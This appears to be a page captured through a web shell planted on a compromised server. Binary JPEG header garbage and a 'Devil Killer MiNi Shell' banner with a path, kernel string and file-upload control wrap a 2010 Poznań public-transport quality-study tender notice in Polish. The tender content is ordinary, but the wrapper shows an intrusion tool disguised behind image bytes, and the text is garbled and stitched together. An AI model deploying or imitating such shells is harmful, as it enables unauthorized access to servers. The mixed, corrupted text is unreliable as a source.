JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100217/44714-N-2010.html

<p class="kh_header"><b>Poznań: badanie jakości i efektywności komunikacji miejskiej w Poznaniu</b><br>
<b>Numer ogłoszenia: 44714 - 2010; data zamieszczenia: 17.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Transportu Miejskiego w Poznaniu , ul. Grunwaldzka 104, 60-307 Poznań, woj. wielkopolskie, tel. 061 861 47 72, faks 061 864 08 85.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> badanie jakości i efektywności komunikacji miejskiej w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SPECYFIKACJA TECHNICZNA 
dla badań jakości i oceny efektywności komunikacji miejskiej w Poznaniu

I.	Realizacja rozkładu jazdy
1. 	Zasady oceny i ocena realizacji rozkładu jazdy
1.1	Zasady oceny realizacji rozkładu jazdy:
1.1.1	obserwacje będą prowadzone w ciągu miesiąca na trasach linii komunikacyjnych objętych rozkładem jazdy, w losowo wybranych punktach kontrolnych określonych  w tabeli nr 1, w tym, w liczbie nie mniejszej niż 80% wynikającej z ppkt. 1.1.6) w dni robocze oraz w ilości nie mniejszej niż 60% wynikającej z ppkt. 1.1.6) w godzinach szczytu komunikacyjnego,
1.1.2	za odjazd punktualny z przystanku uznaje się odjazd pojazdu nie wcześniej niż 1 minutę i nie później niż 3 minuty w stosunku do czasu ustalonego w rozkładzie jazdy, kurs pojazdu zrealizowany na danej linii komunikacyjnej, podczas kontroli, uznaje się za zgodny z rozkładem jazdy, gdy spełnia kryterium odjazdu punktualnego z przystanku, na którym dokonano kontroli (kurs punktualny),
1.1.3	do odjazdów niepunktualnych nie zalicza się odjazdów niezgodnych z przyjętym kryterium, o ile zaistniały one z przyczyn niezależnych od Operatora, takich jak:
	działanie sił przyrody,
	brak zasilania energetycznego w trakcji,
	awarie urządzeń infrastruktury miejskiej uniemożliwiających swobodny przejazd, a także awaria sygnalizacji na skrzyżowaniu,
	zablokowanie ulic i torowisk przez pojazdy obce,
	wstrzymanie ruchu na polecenie policji lub zarządcy drogi.
	wstrzymanie ruchu związane z interwencją policji, 
1.1.4	obserwacje będą dokonywane w punktach kontrolnych określonych w tabeli nr 1 załączonej do specyfikacji technicznej,
1.1.5	czas trwania obserwacji w punktach kontrolnych nie może być krótszy niż 2 godziny,
1.1.6	liczba obserwacji w ciągu miesiąca na liniach komunikacyjnych nie może być mniejsza niż: 

a)	5% planowanej miesięcznej liczby kursów dla każdej linii komunikacyjnej, na której wykonywanych jest nie więcej niż 1000 kursów miesięcznie, ale nie mniej niż 50 obserwacji,
b)	3% planowanej miesięcznej liczby kursów, dla każdej linii komunikacyjnej, na której wykonywanych jest od 1000 do 2000 kursów miesięcznie, ale nie mniej niż 50 obserwacji,
c)	2% planowanej miesięcznej liczby kursów, dla każdej linii komunikacyjnej, na której wykonywanych jest powyżej 2000 kursów miesięcznie, ale nie mniej niż 60 obserwacji.

1.2 	Ocena realizacji rozkładu jazdy
 Wskaźnik punktualności kursowania pojazdów oblicza się wg wzoru: 
 		
 
          
gdzie:
  ilość kursów punktualnych na trasach linii komunikacyjnej w okresie kontroli,
  ilość kursów wg rozkładu jazdy na trasach linii komunikacyjnej w okresie kontroli,
  liczba kursów niepunktualnych na trasach linii komunikacyjnej nie zawinionych przez Operatora.


2.	Ocena realizacji pracy przewozowej
Wskaźnik realizacji pracy przewozowej określa stopień wykonania zamówionej  rozkładami jazdy pracy przewozowej:

x 100%

gdzie:
  wskaźnik pracy przewozowej zrealizowanej dla przyjętych rozkładów jazdy [%],
 liczba wozokilometrów/pociagokilometrów wykonanych zgodnie 
z rozkładem jazdy,
 liczba wozokilometrów/pociągokilometrów zaplanowanych wg rozkładów jazdy.
 II. Stan taboru - prawidłowe wyposażenie i oznakowanie pojazdu, estetyka i czystość pojazdu.

1.	Kontrola i ocena stanu taboru dotyczy:
1)	czystości powierzchni zewnętrznych,
a)	zewnętrzna powierzchnia pojazdu, w tym szyby,
2)	czystości wnętrza pojazdu, w tym:
a)	szyby od wewnątrz pojazdu oraz uszczelki okienne,
b)	podłoga pojazdu,
c)	fotele,
d)	uchwyty.
3)	ekspozycja identyfikatora prowadzącego pojazd,
4)	kompletności informacji pasażerskiej, w tym:
a)	stanu tablic informacyjnych zewnętrznych (kierunkowych) i wewnętrznych,
b)	przepisów taryfowych i porządkowych.

2.	Walidacja oceny w zakresie:
1)	czystości zewnętrznej:
0 pkt. - 	brudne powierzchnie oblachowania; brudne szyby, graffiti, niecenzuralne napisy na powłoce lakierniczej, nieestetyczna folia reklamowa (oderwana lub nieczytelna),
0,20 pkt. -	pojedyncze napisy graffiti na zewnętrznym poszyciu pojazdu,
0,30 pkt. -	bez zastrzeżeń,

2)	czystości wewnętrznej:
0 pkt. - brudne powierzchnie wykładzin wewnętrznych i podłogowych, brudne poręcze, brudne rynienki okien, nieszczelne okna, graffiti i wlepki, rozcięta lub przetarta wykładzina tapicerska foteli pasażerskich; niecenzuralne napisy na ścianach wewnętrznych tramwaju lub autobusu, źle przymocowane nośniki reklamy wewnętrznej, pełne kosze,
0,20 pkt. - pojedyncze napisy graffiti na fotelach i powierzchniach wewnętrznych,
0,30 pkt. - bez zastrzeżeń,

3)	tablic informacyjnych zewnętrznych i wewnętrznych:
0 pkt. - nieczynne lub niekompletne wszystkie tablice, niedziałająca lub nieczytelna tablica czołowa oraz tylna tablica numerowa,
0,20 pkt.- nieczynna tablica wewnętrzna lub boczna kierunkowa lub brak przebiegu trasy (tzw. termometr),
0,25 pkt. - bez zastrzeżeń,

4)	przepisów  taryfowych i porządkowych:
0 pkt. - brak lub całkowita nieczytelność przepisów taryfowych i porządkowych,

0,05 pkt. - porysowane, lekko uszkodzone (ale czytelne) lub naderwane przepisy taryfowe i porządkowe,

0,15 pkt. - bez zastrzeżeń.


3.	Wskaźnik oceny stanu taboru oblicza się wg wzoru:
 
gdzie:
S- suma punktów uzyskanych z ocen poszczególnych pojazdów,
n- ilość pojazdów ocenianych.
4.	Liczba kontroli
Kontroli podlega w skali miesiąca nie mniej niż 510 tramwajów i 690 autobusów:
1)	w zakresie zweryfikowania czystości przy wyjeździe z zajezdni, nie mniej niż 70% podanej liczby,
2)	w pozostałym zakresie na trasie, nie mniej niż 30% podanej liczby.
3)	Kontrola pkt. II. 1. 1) a), oraz II. 1. 2) a) i b), może zostać przeprowadzona 
w momencie rozpoczęcia pracy, lecz nie później niż do zakończenia pierwszego kursu.
4)	Kontrola pkt. II. 1. 2) c) oraz d)  podlega ciągłej kontroli.

Osoby dokonujące przeglądu winny rejestrować nr linii, nr brygady lub nr boczny pojazdu, 
w którym stwierdzono usterki w wyposażeniu.
Każda zajezdnia powinna być skontrolowana nie mniej niż 1 raz w miesiącu.

III. 	Stan przystanków i dworców

1.	Zakres i walidacja oceny:
a)	wyposażenia informacyjno-drogowego:

0 pkt.    - brak symbolu przystankowego,

0,15 pkt.- porysowany lub uszkodzony (ale czytelny) symbol przystankowy, brak numerów linii komunikacyjnej, brak nazwy przystanku,

0,25 pkt. - bez zastrzeżeń,

b)	aktualności i czytelności informacji (rozkładów jazdy, skróconej informacji o taryfie opłat):

0 pkt.      - brak lub całkowita nieczytelność rozkładu jazdy i taryfy opłat,

0,20pkt. - porysowany lub lekko uszkodzony (ale czytelny) rozkład jazdy i taryfa opłat,

0,30 pkt. - bez zastrzeżeń,

c)	stanu technicznego urządzeń przystankowych:

0 pkt. - stan techniczny urządzeń zagrażający bezpieczeństwu pasażerów (wystające elementy konstrukcji wiaty, słupek bez kosza lub przekrzywiony słupek ), złamane lub wyrwane siedziska, (o ile siedziska są na wyposażeniu przystanku),

0,15 pkt. - niewielkie uchybienia, jak np. niedokręcone kosze, ruchome siedziska, pochylony słupek, brak szyb w wiatach,

0,25 pkt.    -  bez zastrzeżeń,

d)	czystości i porządku:

0 pkt. - nieuprzątnięty pojemnik na odpady (poza ewidentnymi przypadkami podrzucania śmieci z prywatnych posesji), stare śmieci wskazujące na brak ekipy sprzątającej, duża ilość niedopałków i opadłych liści w torowisku, nieuprzątnięty 
z powierzchni przystanku śnieg lub lód (po ustaniu opadów), bardzo brudna wiata 
(z wyłączeniem dni, w których temperatura powietrza spada poniżej 0°C),
0,10 pkt. - niewielka ilość niedopałków, pojedyncze papiery, brudna wiata (np. nie wszystkie powierzchnie są brudne),
0,20 pkt. - bez zastrzeżeń.

Kontrola obejmuje nie mniej, niż 1300 przystanków miesięcznie.

2.    Wskaźnik oceny stanu przystanków oblicza się wg wzoru:
			 	
   

gdzie:
S-suma punktów uzyskanych z ocen poszczególnych przystanków,
n- ilość ocenianych przystanków.


IV.	Określanie napełnień taboru komunikacji miejskiej:
Dla opisania wskaźnika rzeczywistego [%] napełnień pojazdów można posługiwać się podaną niżej skalą:
- 0 - brak pasażerów
- 1 - kilku pasażerów
- 2 - zajęta połowa miejsc siedzących
- 3 - zajęte miejsca siedzące
- 4 - zajęta część miejsc stojących ( prześwity miedzy ludźmi na szerokość okna )
- 5 - zajęta część miejsc siedzących ( bez prześwitów szerokości okna )
- 6 - brak prześwitów miedzy ludźmi ( pasażerowie nie przylegają do siebie )
- 7 - brak prześwitów miedzy ludźmi ( nie ma wolnych miejsc pomiędzy stojącymi )
- 8 - brak ruchu plecy na drzwiach (tłoczno )
- 9 - tylko na przystankach - nie wszyscy pasażerowie wsiedli

V.	Klasyfikacja czynników niepunktualności i zawodności - ustalana przy współpracy 
ze służbami nadzoru ruchu przewoźnika:
Tramwaje:
T0 - incydentalnie nieprzejezdne torowiska
T1 - wypadki i kolizje drogowe oraz awarie z przyczyn zewnętrznych
T2 - awarie sygnalizacji świetlnych
T3 - dezorganizacja w ruchu drogowym
T4 - wypadki i kolizje drogowe z winy przewoźnika
T5 - usterki i awarie taboru
T6 - usterki i awarie torowisk
T7 - usterki i awarie zwrotnic
T8 - usterki i awarie trakcji
T9 - inne z przyczyn wewnętrznych
T10 - inne z przyczyn zewnętrznych
Autobusy:
A0 - incydentalne zatłoczenie ulic
A1 - wypadki i kolizje drogowe oraz awarie z przyczyn zewnętrznych
A2 - awarie sygnalizacji świetlnych
A3 - dezorganizacja w ruchu drogowym
A4 - wypadki i kolizje drogowe z winy przewoźnika
A5 - usterki i awarie taboru
A6 - przerzucenie taboru ( do obsługi tras tramwajowych )
A7 - inne z przyczyn wewnętrznych
A8 - inne z przyczyn zewnętrznych
Pierwsze cztery kategorie z w/w i ostatnia ( dla obu kategorii ) określają kategorie usprawiedliwione i nie wpływają na wartość wskaźnika punktualności, łącznie z pozostałymi określają jednak standard punktualności istotny z punktu widzenia pasażera.
Na koniec roku kalendarzowego oferent zobowiązany jest do wyliczenia rentowności każdej 
z poszczególnych linii komunikacji miejskiej, wg wskaźników pasażer km oraz wpływy koszty, objętych rozkładem jazdy.

Sprawozdania oraz zestawienia wyników z badań określonych w punktach I - V za każdy miesiąc kalendarzowy należy prezentować w układzie narastającym.

VI.	Raportowanie badań jakości i oceny efektywności komunikacji miejskiej 
w Poznaniu

1.	Badanie wskaźników punktualności kursowania pojazdów
2.	Dzienne pomiary kontrolne napełnień pojazdów
3.	Napełnienia i przepełnienia w pojazdach - zestawienia zbiorcze 
4.	Zestawienia systematycznych przepełnień
5.	Klasyfikacja przyczyn zawodności
6.	Klasyfikacja niezawodności 
7.	Klasyfikacja przyczyn  i czynników niepunktualności i zawodności
8.	Rozkład odchyleń od planowanego czasu przyjazdu
9.	Zestawienia wskaźników punktualności, zawodności i napełnień wg linii komunikacyjnych
10.	Pomiary potoków w punktach obserwacyjnych
11.	Klasyfikacja linii komunikacyjnych wg maksymalnych potoków pasażerskich
12.	Charakterystyki linii komunikacyjnych dla potoków standardowych ( kalibracja )
13.	Potoki maksymalne na trasach linii komunikacyjnych
14.	Zestawienia wskaźników dla poszczególnych linii komunikacyjnych z zastosowaniem filtrów rodzajowych
15.	Zestawienia wskaźników dla poszczególnych zajezdni z zastosowaniem filtrów rodzajowych
16.	Zestawienia wskaźników dla przystanków i pętli krańcowych z zastosowaniem filtrów rodzajowych
17.	Zestawienia wskaźników dla poszczególnych godzin dnia z zastosowaniem filtrów rodzajowych
18.	Zestawienia wskaźników dla linii komunikacyjnych PST z zastosowaniem filtrów rodzajowych

Zestawienia wskaźników w strukturze badań należy prezentować narastająco w cyklach: tygodnia, miesiąca, półrocza i zakończonego roku kalendarzowego.

VII.	Zasady przeprowadzania kontroli

1.	Kontrole mogą być przeprowadzane bez uprzedniego powiadamiania Operatora i bez udziału jego przedstawicieli. 
2.	Podczas kontroli dokonuje się pomiaru:
2.1	 czasu odjazdu pojazdu z przystanku, za który uznaje się moment ruszenia pojazdu z miejsca wymiany pasażerów, 
2.2	stanu technicznego taboru obsługującego trasy linii komunikacyjnych,
2.3	stanu przystanków i dworców. 
3.	Kontrolę winna być w pełni udokumentowana (data, czas kontroli, numer pojazdu, lokalizacja przystanku, ocena, itp. ).
4.	Kontrole mogą być realizowane na każdym przystanku sieci komunikacyjnej obsługiwanej przez przewoźnika, z zastrzeżeniem, że do oceny jakości nie będą brane pod uwagę kontrole wykonywane na linii zastępczej, przez okres jednego tygodnia 
od daty jej uruchomienia.
5.	Wyniki kontroli w postaci sprawozdania Wykonawca przekazuje Zamawiającemu najpóźniej do dziesiątego dnia następnego miesiąca.

Tabeli nr 1. Wykaz punktów (przystanków) do prowadzenia badań kontroli realizacji rozkładu jazdy komunikacji miejskiej w Poznaniu.

       TRAMWAJE                     AUTOBUSY
Punkt kontrolny	Punkt kontrolny
1.	Żeromskiego
2.	Katedra
3.	Ostroroga
4.	Wielkopolska
5.	Dworzec Zachodni
6.	PKS
7.	Rondo Rataje
8.	Rondo Starołęka
9.	Lechicka P-ń Plaza
10.	Krauthofera
11.	pl. Wiosny Ludów
12.	Bałtyk
13.	Św. Michała
14.	Traugutta
15.	Politechnika	1.	Dworcowa
2.	Wilczak I
3.	Szymanowskiego
4.	Piątkowska
5.	os. Wichrowe Wzgórze
6.	Tułodzieckiej
7.	Przelot
8.	Nad Wierzbakiem
9.	Golęcin
10.	Leśnych Skrzatów
11.	Swoboda
12.	Szpitalna
13.	Polna
14.	Bułgarska
15.	Grochowska
16.	Arciszewskiego
17.	os. Kopernika
18.	Bojanowska
19.	Dębiec
20.	Łozowa
21.	Starołęka Dworzec
22.	os. Armii Krajowej
23.	os. Orła Białego
24.	os. Oświecenia
25.	Ozimina
26.	Piwna
27.	Baraniaka
28.	Rataje Dworzec
29.	Katedra
30.	Zawady
31.	os. Chrobrego
32.	al. Solidarności
33.	Naramowice
34.	Gdyńska Karolin
35.	Piaśnicka

















Tabeli nr 2. Wykaz badanych standardów przewozów, podlegających naliczeniu kar umownych z tytułu ich naruszenia.
Lp.	Treść
1.	Niezatrzymanie się na obowiązującym przystanku (nie dotyczy sytuacji losowych,  wymienionych poniżej:
a)	kolizji i wypadków z udziałem pojazdów MPK, nie powstałych z winy prowadzących pojazd pracowników MPK,
b)	zatarasowań dróg, ulic i torowisk spowodowanych przez kierowców pojazdów obcych lub innych pojazdów komunikacji miejskiej,
c)	zatarasowań dróg, ulic i torowisk wynikłych z zapadnięć jezdni, stąpnięć, awarii sieci wodno-kanalizacyjnych, gazowych, elektrycznych, zalań torowisk i awarii elementów infrastruktury sieciowej w komunikacji tramwajowej,
d)	zatarasowań dróg, ulic i torowisk wynikłych z działania sił natury,
e)	postojów pojazdów MPK związanych z interwencją służb ratowniczych (pogotowie ratunkowe, straż pożarna) lub sił porządkowych (policja, straż miejska, żandarmeria wojskowa, inne uprawnione służby i inspekcje, kontrole biletowe),
f)	jeżeli niemożliwe będzie wykonanie usług przewozowych zgodnie z rozkładem jazdy, 
z przyczyn nie leżących ani po stronie ZTM, ani po stronie MPK.

2.	Zatrzymanie się na przystanku nie objętym rozkładem jazdy
3.	Realizowanie przewozu pojazdem, którego stan techniczno-eksploatacyjny oraz stan wyposażenia wnętrza stanowi zagrożenie dla pasażerów, np. wystające elementy metalowe, ruchome siedzenia, urwane lub nie przymocowane poręcze itp.
4.	Nieszczelne okna, powodujące zalewanie siedzeń podczas deszczu
5.	Brak, po zmroku, co najmniej 80% włączonego oświetlenia wewnątrz pojazdu, nie obejmującego przedniej prawej lampy w przedziale pasażerskim.
6.	Brak numeru ewidencyjnego w wyznaczonym miejscu pojazdu bądź nieczytelny lub niewłaściwy numer pojazdu 
7.	Palenie tytoniu przez kierującego w kabinie kierowcy lub motorniczego
8.	Przewożenie pasażerów w kabinie kierującego pojazdem, z wyjątkiem szkolącego
9.	Niewywieszenie we wskazanym miejscu identyfikatora numeru brygady lub zasłonięcie go w sposób uniemożliwiający odczyt
10.	Niewywieszenie w określonym miejscu identyfikatora prowadzącego pojazd lub zasłonięcie go w sposób uniemożliwiający odczyt
11.	Korzystanie z telefonu komórkowego lub posiadanie słuchawek nałożonych na uszy podczas prowadzenia pojazdu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówienia z wolnej ręki, w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zgodnie z art. 22 ust. 1 ustawy, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
  1)   posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;

  2)   posiadania wiedzy i doświadczenia w zakresie oceny jakości usług w transporcie zbiorowym;

  3)   dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;

  4)   sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonywał podobne usługi, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Chodzi o usługi wykonywane łącznie:

a.	dla minimum 1 miasta w ciągu ostatnich 3 lat - studiów oceny potoków pasażerskich lub rentowności linii komunikacyjnych;

b.	w ciągu ostatnich 3 lat, kontroli jakości usług transportowych;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada niezbędne do wykonania zamówienia narzędzia i urządzenia. W szczególności posiada odpowiednie oprogramowanie planistyczne umożliwiające tworzenie modelu transportowego (potoków pasażerskich), projektowanie układów sieci dróg, prognozowanie ruchu oraz analizę i symulację ruchu z wykorzystaniem podkładu cyfrowego mapy miasta - np. programy typu VISUM lub EMME</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje co najmniej 5 osobami zdolnymi do wykonania zamówienia. Osoby te mają kierunkowe wykształcenie z zakresu inżynierii transportu lub wykształcenie wyższe techniczne albo ekonomiczne z co najmniej 5 letnim doświadczeniem w firmie o profilu inżynierskim i zajmującymi się problematyką związaną z komunikacją publiczną (np. pomiary, analizy ruchu, analizy ekonomiczne i finansowe).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

